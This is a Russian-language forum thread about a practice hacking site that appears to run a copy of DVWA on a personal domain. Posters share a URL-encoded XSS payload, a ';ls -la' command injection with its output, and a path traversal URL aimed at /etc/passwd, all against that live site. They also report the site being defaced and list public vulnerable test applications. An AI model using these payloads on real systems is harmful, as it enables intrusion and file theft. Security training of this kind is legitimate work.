Площадка для тренировки по взлому

Площадка для тренировки по взлому.
Имеется 3 уровня сложности.
Что не работает пишем суда.

-------------------------------------------
Взламывай на здоровье ! (В.Н.З.)
--------------------------------------------

 

Code:

http://tortop.msk.ru/xss.php?name=%3c%53%43%52%49%50%54%3e%61%6c%65%72%74%28%2f%42%65%6c%6f%76%2f%2e%73%6f%75%72%63%65%29%3c%2f%53%43%52%49%50%54%3e

 

признаю свою ошибку, не видел выбор уровня

 

;ls -la
total 716
drwx------ 8 whatthis customers 4096 Dec 23 20:07 .
drwx------ 3 whatthis customers 4096 Sep 14 13:49 ..
-rw------- 1 whatthis customers 143 Dec 23 20:07 .htaccess
-rw------- 1 whatthis customers 2517 Dec 23 20:07 CHANGELOG.txt
-rw------- 1 whatthis customers 32485 Dec 23 20:07 COPYING.txt
-rw------- 1 whatthis customers 553472 Nov 13 14:38 MyProxy.exe
-rw------- 1 whatthis customers 3194 Dec 23 20:07 README.txt
-rw------- 1 whatthis customers 1538 Dec 23 20:07 SQLi.php
-rw------- 1 whatthis customers 383 Dec 23 20:07 about.php
drwx------ 2 whatthis customers 4096 Nov 28 22:51 admin
drwx------ 3 whatthis customers 4096 Dec 23 20:23 board
-rw------- 1 whatthis customers 1391 Dec 23 20:07 brute.php
drwx------ 2 whatthis customers 4096 Sep 14 13:49 cgi-bin
-rw------- 1 whatthis customers 152 Dec 23 20:07 config.php
-rw------- 1 whatthis customers 1274 Dec 23 20:07 csrf.php
-rw------- 1 whatthis customers 1112 Dec 23 20:07 exec.php
-rw------- 1 whatthis customers 358 Dec 23 20:07 fi.php
-rw------- 1 whatthis customers 711 Dec 23 20:07 fi_content.php
drwx------ 5 whatthis customers 4096 Dec 23 20:07 includes
-rw------- 1 whatthis customers 911 Dec 23 20:11 index.php
-rw------- 1 whatthis customers 1434 Dec 23 20:07 main.css
-rw------- 1 whatthis customers 20594 Nov 13 14:39 myproxy.zip
-rw------- 1 whatthis customers 148 Dec 23 20:07 php.ini
-rw------- 1 whatthis customers 19 Dec 23 20:07 phpinfo.php
drw-rw-rw- 6 whatthis customers 4096 Oct 14 19:59 quest
-rw------- 1 whatthis customers 25 Dec 23 20:07 robots.txt
-rw------- 1 whatthis customers 831 Dec 23 20:07 security.php
-rw------- 1 whatthis customers 2024 Dec 23 20:07 setup.php
-rw------- 1 whatthis customers 757 Dec 23 20:07 upload.php
drwx------ 2 whatthis customers 4096 Dec 23 21:00 uploads
-rw------- 1 whatthis customers 1775 Dec 23 20:07 xss.php

 

http://tortop.msk.ru/dvwa/includes/source/fi_source.php

Ошибка. Ссылка не работает.

 

Ну если я ограничился просто добавлением die(); то другие могли снести сайт под корень, совсем не продумал ты ничего, фактически оставил шелл на сайте, а ведь у тебя там есть и другие проекты (к примеру naume.ru) к которым можно перелезть, залив шелл на сайт для тренинга.

P.S. а ну вот видишь теперь кто то уже написал "Haked by Webkill".
P.P.S. могу бы хотя бы права на запись убрать для начала.
Ну а вообще смысла в идеи не вижу.

 

эх я отошел не дали мне время )

 

БАЛИН сайт для тренировки а не для того чтобы всё изговнеть Понял webkill !!!!

 

http://tortop.msk.ru/fi.php?page=../../../../../../../../etc/passwd%00

 

Online-ресурсы для проведения аудита (читай: площадки для тренировки по взлому):

1) тестовые сайты от Acunetix:

- http://testphp.acunetix.com/ (PHP);
- http://testasp.acunetix.com/ (ASP);
- http://testaspnet.acunetix.com/ (ASP.NET);

2) тестовый сайт от HP: http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com

3) тестовый сайт от IBM: http://demo.testfire.net/

Сборки уязвимых web-приложений (для самостоятельной установки):

1) Stanford SecuriBench: http://suif.stanford.edu/~livshits/securibench/
2) OWASP WebGoat: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

3) Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Проекты аналогичной тематики рассчитаны на аудиторию, от которой можно ожидать всего что угодно, поэтому и проектируются они stand-alone от рабочих проектов.

 

Мда... А толку от этого? Скачал эту площадку - http://forum.antichat.ru/thread130070.html, залил себе на сайт... Хоть бы копирайты в теме поставил.

PS: Когда я тренировался на ней, видел, там было написано "Ни в коем случае не загружайте эту площадку на свои сайты" (точно не помню, по английски было написано...)

 

Ресурсы перечислил для тех, кто заинтересовался данным топиком. Сайт ТС полезен, но спроектирован неудачно, что повлекло за собой его неработоспособность (надеюсь, временную).

Перечисленные мною сайты, возможно, могут послужить альтернативой для интересующейся аудитории.

Все сайты брал исключительно из своей коллекции, значительную часть из которой нашел в блоге, адрес которого уже не помню.